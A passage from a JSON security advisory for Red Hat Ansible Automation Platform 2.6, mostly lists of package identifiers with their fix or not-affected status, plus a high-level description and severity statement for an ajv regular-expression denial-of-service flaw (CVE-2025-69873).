"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption"
},
{
"cve": "CVE-2025-69873",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-11T19:01:32.953264+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439070"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ajv: ReDoS via $data reference",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, the $data option must be enabled and the attacker needs to be able to send a payload with a specially crafted regular expression to the application processing the input. A 31-character payload causes approximately 44 seconds of execution, with each additional character doubling the execution time. Therefore, even a small payload can cause an application to become unresponsive and eventually result in a denial of service. Due to this reason, this flaw has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
